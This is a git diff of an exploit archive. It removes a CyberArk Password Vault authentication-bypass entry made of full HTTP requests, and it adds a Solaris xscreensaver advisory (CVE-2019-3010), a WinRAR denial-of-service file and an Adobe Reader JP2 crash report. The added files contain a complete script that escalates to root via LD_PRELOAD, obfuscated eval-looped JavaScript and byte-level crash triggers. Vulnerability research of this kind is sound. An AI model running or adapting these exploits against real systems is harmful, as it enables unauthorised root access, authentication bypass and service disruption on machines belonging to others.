diff --git a/exploits/linux/webapps/47512.txt b/exploits/linux/webapps/47512.txt
deleted file mode 100644
index 59f3aaec6..000000000
--- a/exploits/linux/webapps/47512.txt
+++ /dev/null
@@ -1,80 +0,0 @@
-# Exploit Title: CyberArk Password Vault 10.6 - Authentication Bypass
-# Date: 2019-10-16
-# Author: Daniel Martinez Adan (adon90)
-# Vendor: https://www.cyberark.com
-# Software: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
-# Collaborator: Luis Buendía (exoticpayloads)
-# Version Affected: All
-     
-# It is possible to retrieve a valid cookie by injecting special characters
-# in the username field:
-
-vulnerable parameter:
-pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername
-
-URL:
-/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
-
-Payload:
-%1F
-
-# Requirements:
-# Using a valid ViewState -> if it doesn't work, go to the login panel to
-# automatically generate a valid ViewState
-
-
-# Once the valid cookie is obtained, it is posible to perform multiple
-# actions in the PasswordVault such us:
-# - Retrieving valid user information (Name, Email, Phone number….)
-# - DoS
-# - DNS enumeration via ip address
-# - Possibly deleting users
-
-
-# Login Bypass:
-
-POST /PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx HTTP/1.1
-Host: TARGET
-User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
-Accept-Encoding: gzip, deflate
-Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 2435
-Connection: close
-Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca
-Upgrade-Insecure-Requests: 1
-__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=gjUPDVmn3eCu84zX77GBo4yZO5ypQSyENJ%2FiPcWTNRTh9MtlLoZ6wvk6nCnoK8MeZfh%2BUA9fqjr80wBpvTA04Xkq8mnhgITyUkAx8PuG09vlGK7CBUxV4PHxPooSWtC%2F2RccxoRIuCucsVDXD27UTCiS4VmDoUWDORoecURYhzV2PH7pXm4XGNtNxeI%2FuLXPvwVYAOYkyUZZloZALalGC54rL24Iery7YR0uYvaC61OmxhCtYVy8zHlu7p2fK%2FUHxGxw3oMKrVJA%2BTCT1%2B5AoO4apN7uA%2BBmJzFhcl9vPrdlgCdu%2F1Ei%2F1O0oVn6BOd%2BhFDHdDbpKAX6xIJAWRfb9%2BGG8qobGKR%2B8Fvhao9hx3oCieBe7BvJL%2Fe9Y61tLtvnoLBHwc7uvG4V1lg5oNcQQeEZTGosZ3xrt3dR3kZe2b6vY0QG8YVlJCv56Xb1Ylr7mI7FIbUbKxbZvIkIPrPlKTvkzUTYGXsBOVXNy9KyAhI2%2B9DVkTFFhp%2FK4uWMCMxVq%2FgRxiEyukUbWvobQxSnUH4aNntJiD0Nmlc6UzwNxfvo%2FUNJx8i0yoPoi4PMomsQTE6%2FjtAQiO9rrf6syMLp2lLqXzQ7u90BqyUB9%2BOkn2C2AKZcir2KyT4vGcVOgEfUiZ7twd%2B4uq4acPpQBNto3zBCtgtKzW5iv8TfSCRuigtaT7Oz5qZvWq7UX%2Bqye9cugocb%2BUbaWVXJqcy0Gkdm0BPrRpiCbkSYqfx%2Fo7fYuDjEnMhXrOwBCUOfHhAcjXHZeeJY%2FKsnRP0Aa2%2BNzCOPimbvVEIq0CzTonYV6WFh1a0aDc0m8Qgchz9RnYR67efSftSQYpPzsBIdp0MsFuZ5AmSPROHH37N0zWVV%2BlVvPfwuSlLFV8d5Kq41KJtucYwenrZMq7lhKcDvaRZz5LOFR71DdrYwZoPloK4BK3yl8w8GaOnyRSQsQ0yW4xj5RbJLKN5J54I2fXDkgIVMJY6dbsztZ2JO%2BTpa5xPjJCIjXTR%2B4pJTqCBWc%2FLJ0xzz6x2EOOP9eMY8RH3GaEdg8Lww66zOzpIyXiOBT0VqyRTDxVd2UnEwJZDqwmcHh1n1nN%2BAQoWk2aJDBev9WiGLSx2GxtipLElZsWTcG5txklqFKB7b5mG2jIsx4%2B%2BRlAz2q6b8YJxKem1FnJwQhTyWZ5%2BgEnEGYIylH%2FsYP2eOcBJr5J7gamu%2FsqF9fZa4AJHxEx%2BspDmzm607z8H2AqOhWRemllMT87KVlCuTKiWw3gj7bhj19KtaE1AwmHid5ISXbt%2F5Gcw4LDvDkmfR1akym0jPGdECSyJG0qbhKiE3abdXESlMCURfX6g1W%2B9i8WZJ4hDtHcsPudD6yhp32NSDa2eVqw%3D%3D&__VIEWSTATEGENERATOR=4EAA75BD&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=yRuqYr%2BEabjm0oMhAb6WmehsX2QOYJhKOP0z9IJq8R2B9Md%2Fi17pZwRXSuLkNN72eNRdEnD%2Fcjr3L3KJLehz7ol6U%2BUONvRqU3dO66PrJIvFj%2BDji4%2FvZeOpLeaI0nY9mSU7%2FdBiOgLzdPnDtNu9G%2BwlR4Z8FdWPayd8UDMqShb%2FmObsqqsoxooNVf8jUFa1X98oKyPHztYNS6ip8fIBl4ksqvsPQhZnc%2Fj%2FniKwWp2GZ%2FmnEhIYMxVVx5tirrB16M4dJqa5ROmxuL%2FJcnW0hqFlAkAycTdep5r0nvN1kXXrIco4RhE52ZbP9yKpr5%2FOyVASLr42dCgOSKXcgkFL1A%3D%3D&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername=%1F&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtPassword=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AbtnLogon=Sign+in&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword2Hidden=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3APasswordHidden=admin&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword1Hidden=&AuthModuleUsed=radius&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ASkipChangePwd=
-
-
-# User Information:
-
-POST /PasswordVault/services/PrivilegedAccountAccess.asmx/GetUserDetails HTTP/1.1
-Host: TARGET
-User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
-Accept-Encoding: gzip, deflate
-Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
-Connection: close
-Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
-Upgrade-Insecure-Requests: 1
-Content-Type: application/json
-Content-Length: 28
-{"userName":"administrator"}
-
-
-# Resolve DNS / DoS
-
-GET /PasswordVault/ResolveMachineAddress.aspx?data=&moreinfo=127.0.0.1 HTTP/1.1
-Host: TARGET
-User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
-Accept-Encoding: gzip, deflate
-CAAjax: adon90
-Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx
-Connection: close
-Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109
-Upgrade-Insecure-Requests: 1
\ No newline at end of file
diff --git a/exploits/solaris/local/47529.txt b/exploits/solaris/local/47529.txt
new file mode 100644
index 000000000..0288c5fa6
--- /dev/null
+++ b/exploits/solaris/local/47529.txt
@@ -0,0 +1,168 @@
+@Mediaservice.net Security Advisory #2019-02 (last updated on 2019-10-16)
+
+         Title:  Local privilege escalation on Solaris 11.x via xscreensaver
+   Application:  Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4
+    Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3
+    Other versions starting from 5.06 are potentially affected
+     Platforms:  Oracle Solaris 11.x (tested on 11.4 and 11.3)
+    Other platforms are potentially affected (see below)
+   Description:  A local attacker can gain root privileges by exploiting a
+    design error vulnerability in the xscreensaver distributed with
+    Solaris
+        Author:  Marco Ivaldi <marco.ivaldi@mediaservice.net>
+ Vendor Status:  <secalert_us@oracle.com> notified on 2019-07-09
+      CVE Name:  CVE-2019-3010
+   CVSS Vector:  CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8)
+    References: https://lab.mediaservice.net/advisory/2019-02-solaris-xscreensaver.txt
+    https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
+    https://www.jwz.org/xscreensaver/
+    https://www.oracle.com/technetwork/server-storage/solaris11/
+    https://www.mediaservice.net/
+    https://0xdeadbeef.info/
+
+1. Abstract.
+
+Exploitation of a design error vulnerability in xscreensaver, as distributed
+with Solaris 11.x, allows local attackers to create (or append to) arbitrary
+files on the system, by abusing the -log command line switch introduced in
+version 5.06. This flaw can be leveraged to cause a denial of service condition
+or to escalate privileges to root.
+
+2. Example Attack Session.
+
+raptor@stalker:~$ cat /etc/release
+                             Oracle Solaris 11.4 X86
+  Copyright (c) 1983, 2018, Oracle and/or its affiliates.  All rights reserved.
+                            Assembled 16 August 2018
+raptor@stalker:~$ uname -a
+SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc
+raptor@stalker:~$ id
+uid=100(raptor) gid=10(staff)
+raptor@stalker:~$ chmod +x raptor_xscreensaver
+raptor@stalker:~$ ./raptor_xscreensaver
+raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
+Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+[...]
+Oracle Corporation      SunOS 5.11      11.4    Aug 2018
+root@stalker:~# id
+uid=0(root) gid=0(root)
+
+3. Affected Platforms.
+
+This vulnerability was confirmed on the following platforms:
+
+* Oracle Solaris 11.x X86 [tested on 11.4 and 11.3, default installation]
+* Oracle Solaris 11.x SPARC [untested]
+
+Previous Oracle Solaris 11 versions might also be vulnerable.
+
+Based on our analysis and on feedback kindly provided by Alan Coopersmith of
+Oracle, we concluded that this is a Solaris-specific vulnerability, caused by
+the fact that Oracle maintains a slightly different codebase from the upstream
+one. Alan explained this as follows:
+
+"The problem in question here appears to be inherited from the long-ago fork
+[originally based on xscreensaver 4.05] Sun & Ximian did to add a gtk-based
+unlock dialog with accessibility support to replace the non-accessible Xlib
+unlock dialog that upstream provides, which moves the uid reset to after where
+the log file opening was later added."
+
+Specifically, the problem arises because of this bit of Solaris patches:
+https://github.com/oracle/solaris-userland/blob/18c7129a50c0d736cbac04dcfbfa1502eab71e33/components/desktop/xscreensaver/patches/0005-gtk-lock.patch#L3749-L3770
+
+As an interesting side note, it appears Red Hat dropped this code back in 2002
+with version 4.05-5:
+https://src.fedoraproject.org/rpms/xscreensaver/blob/9a0bab5a19b03db9671fc5a20714755445f19e21/f/xscreensaver.spec#L2178-2179
+
+4. Fix.
+
+Oracle has assigned the tracking# S1182608 and has released a fix for all
+affected and supported versions of Solaris in their Critical Patch Update (CPU)
+of October 2019.
+
+As a temporary workaround, it is also possible to remove the setuid bit from
+the xscreensaver executable as follows (note that this might prevent it from
+working properly):
+
+bash-3.2# chmod -s /usr/bin/xscreensaver
+
+5. Proof of Concept.
+
+An exploit for Oracle Solaris 11.x has been developed as a proof of concept. It
+can be downloaded from:
+
+https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver
+
+#!/bin/sh
+
+#
+# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
+# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# Exploitation of a design error vulnerability in xscreensaver, as 
+# distributed with Solaris 11.x, allows local attackers to create
+# (or append to) arbitrary files on the system, by abusing the -log
+# command line switch introduced in version 5.06. This flaw can be
+# leveraged to cause a denial of service condition or to escalate
+# privileges to root. This is a Solaris-specific vulnerability,
+# caused by the fact that Oracle maintains a slightly different
+# codebase from the upstream one (CVE-2019-3010).
+#
+# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
+# "Good hackers force luck." -- ~A.
+#
+# This exploit targets the /usr/lib/secure/ directory in order
+# to escalate privileges with the LD_PRELOAD technique. The
+# implementation of other exploitation vectors, including those
+# that do not require gcc to be present on the target system, is
+# left as an exercise to fellow UNIX hackers;)
+#
+# Usage:
+# raptor@stalker:~$ chmod +x raptor_xscreensaver
+# raptor@stalker:~$ ./raptor_xscreensaver
+# [...]
+# Oracle Corporation      SunOS 5.11      11.4    Aug 2018
+# root@stalker:~# id
+# uid=0(root) gid=0(root)
+# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
+#
+# Vulnerable platforms:
+# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
+# Oracle Solaris 11 SPARC [untested]
+#
+
+echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
+echo "Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
+echo
+
+# prepare the payload
+echo "int getuid(){return 0;}" > /tmp/getuid.c
+gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
+if [ $? -ne 0 ]; then
+echo "error: problem compiling the shared library, check your gcc"
+exit 1
+fi
+
+# check the architecture
+LOG=/usr/lib/secure/getuid.so
+file /bin/su | grep 64-bit >/dev/null 2>&1
+if [ $? -eq 0 ]; then
+LOG=/usr/lib/secure/64/getuid.so
+fi
+
+# start our own xserver
+# alternatively we can connect back to a valid xserver (e.g. xquartz)
+/usr/bin/Xorg :1 &
+
+# trigger the bug
+umask 0
+/usr/bin/xscreensaver -display :1 -log $LOG &
+sleep 5
+
+# clean up
+pkill -n xscreensaver
+pkill -n Xorg
+
+# LD_PRELOAD-fu
+cp /tmp/getuid.so $LOG
+LD_PRELOAD=$LOG su -
\ No newline at end of file
diff --git a/exploits/windows/dos/47525.txt b/exploits/windows/dos/47525.txt
new file mode 100644
index 000000000..117a45982
--- /dev/null
+++ b/exploits/windows/dos/47525.txt
@@ -0,0 +1,73 @@
+# Exploit Title: winrar 5.80 64bit - Denial of Service
+# Date: 2019-10-19
+# Exploit Author: alblalawi
+# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
+# Version: 5.80
+# Tested on: Microsoft Windows Version 10.0.18362.418 64bit
+
+# 1- open winrar or any file.rar
+# 2- help
+# 3- help topics
+# 4- Drag the exploit to the window
+
+# Save the content html
+
+
+<script type="text/javascript">
+//<![CDATA[
+<!--
+var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
+"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+
+"\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" +
+"e(x.charCodeAt(i)^(y++));}return o;}f(\\\"\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\"+
+"\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh" +
+"83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\"+
+"\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\"+
+"\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02" +
+"5\\\\\\\\025\\\\\\\\010\\\\\\\\030\\\\\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\\\" +
+"\\\\177jith\\\\\\\\\\\"\\\\|\\\\\\\\003g[TLTB[u\\\\\\\\010\\\\\\\\013OB@[U_" +
+"F\\\\\\\\016h\\\\\\\\027\\\\\\\\033\\\\\\\\006d\\\\\\\\033\\\\\\\\004gNaP\\" +
+"\\\\\\003\\\\\\\\\\\"\\\\.&:z\\\\\\\\0314\\\\\\\\033&u9(>$>;p=3=3 70=d\\\\\\"+
+"\\006y\\\\\\\\n\\\\\\\\037\\\\\\\\r<\\\\\\\\022\\\\\\\\010\\\\\\\\022\\\\\\" +
+"\\027J \\\\\\\\010\\\\\\\\004\\\\\\\\007\\\\\\\\r\\\\\\\\0177NS2\\\\\\\\035" +
+",\\\\\\\\037.\\\\\\\\001(\\\\\\\\033VWX=\\\\\\\\023\\\\\\\\026\\\\\\\\\\\\\\"+
+"\\\\\\\\\\016\\\\\\\\026l!\\\\\\\\\\\"\\\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\\\" +
+"\\\\010}\\\\\\\\000tWFTNX]\\\\\\\\004xDHBCl\\\\\\\\023\\\\\\\\033\\\\\\\\02" +
+"3\\\\\\\\024iDkV\\\\\\\\031\\\\\\\\032\\\\\\\\033\\\\\\\\177\\\\\\\\\\\\\\\\"+
+"RS`2*/j\\\\\\\\0273)`\\\\\\\\025h\\\\\\\\027n\\\\\\\\021l,=5|6,0\\\\\\\\nu\\"+
+"\\\\\\004{\\\\\\\\006yu}~\\\\\\\\003\\\\\\\\022=\\\\\\\\014CDE5\\\\\\\\002\\"+
+"\\\\\\034I\\\\\\\\031\\\\\\\\003\\\\\\\\000MSO>\\\\\\\\036\\\\\\\\006\\\\\\" +
+"\\033\\\\\\\\035\\\\\\\\033\\\\\\\\021WXYZ'\\\\\\\\016!\\\\\\\\020 !\\\\\\\\"+
+"\\\"\\\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\\\\\017IVNH\\\\\\\\033\\\\\\\\004\\"+
+"\\\\\\016\\\\\\\\023\\\\\\\\031\\\\\\\\021\\\"\\\\,28)\\\"(f};)lo,0(rtsbus." +
+"o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" +
+"=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\""+
+")"                                                                           ;
+while(x=eval(x));
+//-->
+//]]>
+</script>
+<script type="text/javascript">
+//<![CDATA[
+<!--
+var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" +
+"=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" +
+".substr(0,ol);}f(\")19,\\\"ZPdw771\\\\b77-0xjk-7=3771\\\\sp,cw$520\\\\:330\\"+
+"\\xg030\\\\jj9%530\\\\b000\\\\XZUUVX620\\\\LP\\\\\\\\Pr\\\\610\\\\KOHD400\\" +
+"\\620\\\\720\\\\\\\\\\\\WOWGPr\\\\530\\\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" +
+"30\\\\t\\\\ 520\\\\&310\\\\$n\\\\200\\\\)230\\\\/000\\\\-K530\\\\310\\\\310" +
+"\\\\n\\\\630\\\\010\\\\IULFW620\\\\600\\\\400\\\\700\\\\520\\\\=*100\\\\(70" +
+"0\\\\4500\\\\*310\\\\-u}xy8pt~}|{771\\\\itg/e771\\\\sb|`V620\\\\530\\\\NT\\" +
+"\\\\\\MdYjGh010\\\\@TVI[O410\\\\620\\\\n\\\\330\\\\ZB@CQA200\\\\SAijArGhEec" +
+"J{HaN*2S?9t)V)5,&waedtbn\\\\!010\\\\'420\\\\%n\\\\+r\\\\U]XY030\\\\PT^]\\\\" +
+"\\\\[ZY]GZEr\\\\CYQ@b~4|);/pw$:2'610\\\\?410\\\\=220\\\\vn720\\\\h520\\\\hz" +
+"f7!%$4\\\"\\\\730\\\\L\\\\\\\\JOfWdEjN420\\\\230\\\\230\\\\IU710\\\\@BE_IG]" +
+"AHyV771\\\\430\\\\300\\\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\\\\\410\\\\!B7" +
+"30\\\\330\\\\430\\\\020\\\\K030\\\\)600\\\\/L530\\\\530\\\\330\\\\600\\\\QN" +
+"C400\\\\500\\\\r\\\\320\\\\710\\\\720\\\\320\\\\M620\\\\710\\\\500\\\\2+>3?" +
+"\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" +
+";l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")"                 ;
+while(x=eval(x));
+//-->
+//]]>
+</script>
\ No newline at end of file
diff --git a/exploits/windows/dos/47528.txt b/exploits/windows/dos/47528.txt
new file mode 100644
index 000000000..35860811a
--- /dev/null
+++ b/exploits/windows/dos/47528.txt
@@ -0,0 +1,85 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(7f2c.8be8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000080 ebx=00001b52 ecx=00000080 edx=00000080 esi=00000001 edi=6f587000
+eip=6a005324 esp=050fbc14 ebp=050fbc34 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
+JP2KLib!IJP2KException::GetErrString+0x3224:
+6a005324 8817            mov     byte ptr [edi],dl          ds:002b:6f587000=??
+
+0:000> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 050fbc34 6a0030e8 00001b52 00001b53 00000000 JP2KLib!IJP2KException::GetErrString+0x3224
+01 050fbcb0 69ff3bf0 0000000a 000002ce 00000001 JP2KLib!IJP2KException::GetErrString+0xfe8
+02 050fbd44 69ff4132 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe9d0
+03 050fbda0 69ff43f9 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xef12
+04 050fbdc8 69ff37bc 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xf1d9
+05 050fbe7c 69ff31eb 050fbf88 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe59c
+06 050fbebc 6a005d8a 0000000d 00000008 000000ff JP2KLib!JP2KCopyRect+0xdfcb
+07 050fbf1c 5f721b53 62c74e88 0000000d 00000008 JP2KLib!JP2KImageDecodeImageRegion+0x2a
+08 050fbf9c 5f71544b 6ad22fac 050fbfcc 5f115889 AcroRd32!AX_PDXlateToHostEx+0x343e93
+09 050fbfa8 5f115889 6ad22fac 62c7cfb0 5f1157f0 AcroRd32!AX_PDXlateToHostEx+0x33778b
+0a 050fbfcc 5f115783 6ad0efe0 00000001 0000001b AcroRd32!DllCanUnloadNow+0x4c929
+0b 050fbfec 5f561d7a 050fc010 6ad0efe0 0000001b AcroRd32!DllCanUnloadNow+0x4c823
+0c 050fc030 5f24afc8 c0020000 00000004 6ad0efe0 AcroRd32!AX_PDXlateToHostEx+0x1840ba
+0d 050fc384 5f24a506 050fc3e0 53406a98 95e3efd6 AcroRd32!DllCanUnloadNow+0x182068
+0e 050fc3bc 5f24a3e1 050fc3e0 53406a98 050fc44c AcroRd32!DllCanUnloadNow+0x1815a6
+0f 050fc428 5f2493a8 c0020000 00000004 53406a98 AcroRd32!DllCanUnloadNow+0x181481
+10 050fc888 5f2468f7 050fcb8c 686e45ac c0020000 AcroRd32!DllCanUnloadNow+0x180448
+11 050fe068 5f246575 686e45ac c0020000 00000004 AcroRd32!DllCanUnloadNow+0x17d997
+12 050fe138 5f22a25c 95e3ce72 5d91af78 00000000 AcroRd32!DllCanUnloadNow+0x17d615
+13 050fe218 5f229057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc
+14 050fe264 5f21c183 5d91af78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7
+15 050fe3d8 5f21ba97 553e6dbc 00000001 6a169ef8 AcroRd32!DllCanUnloadNow+0x153223
+16 050fe440 5f219281 95e3c8aa 5323efc8 5adccea8 AcroRd32!DllCanUnloadNow+0x152b37
+17 050fe4c0 5f218dae 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x150321
+18 050fe4fc 5f218d07 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x14fe4e
+19 050fe584 5f2182ee 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14fda7
+1a 050fe5c0 5f216f02 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14f38e
+1b 050fe884 5f215d98 6a169ef8 050fe918 050fe968 AcroRd32!DllCanUnloadNow+0x14dfa2
+1c 050fe988 5f2143b8 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
+1d 050fe9ec 5f21414d 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b458
+1e 050fea0c 5f212d3c 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
+1f 050feac4 5f212762 00000001 00000000 95e3c776 AcroRd32!DllCanUnloadNow+0x149ddc
+20 050feb1c 5f21257a 7d8b4ef0 00000001 95e3c7ea AcroRd32!DllCanUnloadNow+0x149802
+21 050feb80 5f2122ff 050fec74 95e3c0fe 80882fa0 AcroRd32!DllCanUnloadNow+0x14961a
+22 050fec94 5f0d687c 80882fa0 5f0d67a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
+23 050fecac 5f0d678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
+24 050fecc8 745de0bb 00180a60 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
+25 050fecf4 745e8849 5f0d66d0 00180a60 0000000f USER32!_InternalCallWinProc+0x2b
+26 050fed18 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
+27 050fede8 745d8503 5f0d66d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
+28 050fee50 745d8aa0 147683c0 00000000 0000000f USER32!DispatchClientMessage+0x1b3
+29 050fee98 77371a6d 050feeb4 00000020 050fef14 USER32!__fnDWORD+0x50
+2a 050feed0 745d91ee 050fef64 5a5cb65c 18836dd8 ntdll!KiUserCallbackDispatcher+0x4d
+2b 050fef24 745d8c20 5f535978 050fef48 5f0eda6d USER32!DispatchMessageWorker+0x5be
+2c 050fef30 5f0eda6d 050fef64 18836dd8 18836dd8 USER32!DispatchMessageW+0x10
+2d 050fef48 5f0ed89e 050fef64 95e3c3d6 18836dd8 AcroRd32!DllCanUnloadNow+0x24b0d
+2e 050fefbc 5f0ed744 95e3c39e 18836dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
+2f 050feff4 5f07c575 95e3dc0e 17484ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
+30 050ff064 5f07bf81 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x775
+31 050ff484 0011783d 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x181
+32 050ff850 002201aa 00110000 00000000 0bd5b3f2 AcroRd32_exe+0x783d
+33 050ff89c 76698674 04f5f000 76698650 c83dc0c6 AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
+34 050ff8b0 77365e17 04f5f000 07a6f6f5 00000000 KERNEL32!BaseThreadInitThunk+0x24
+35 050ff8f8 77365de7 ffffffff 7738ad9e 00000000 ntdll!__RtlUserThreadStart+0x2f
+36 050ff908 00000000 00111390 04f5f000 00000000 ntdll!_RtlUserThreadStart+0x1b
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled.
+
+- The crash occurs immediately after opening the PDF document, and is caused by attempting to write data outside of a heap-based buffer.
+
+- Attached samples: poc.pdf (crashing file), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to 5 bytes inside of a binary JP2 image stream: 4 bytes at offset 0x195 changed from <FF FF E0 00> to <00 00 00 C0>, and 1 byte at offset 0x1ED changed from <0x53> to <0x5B>.
+
+
+Proof of Concept:
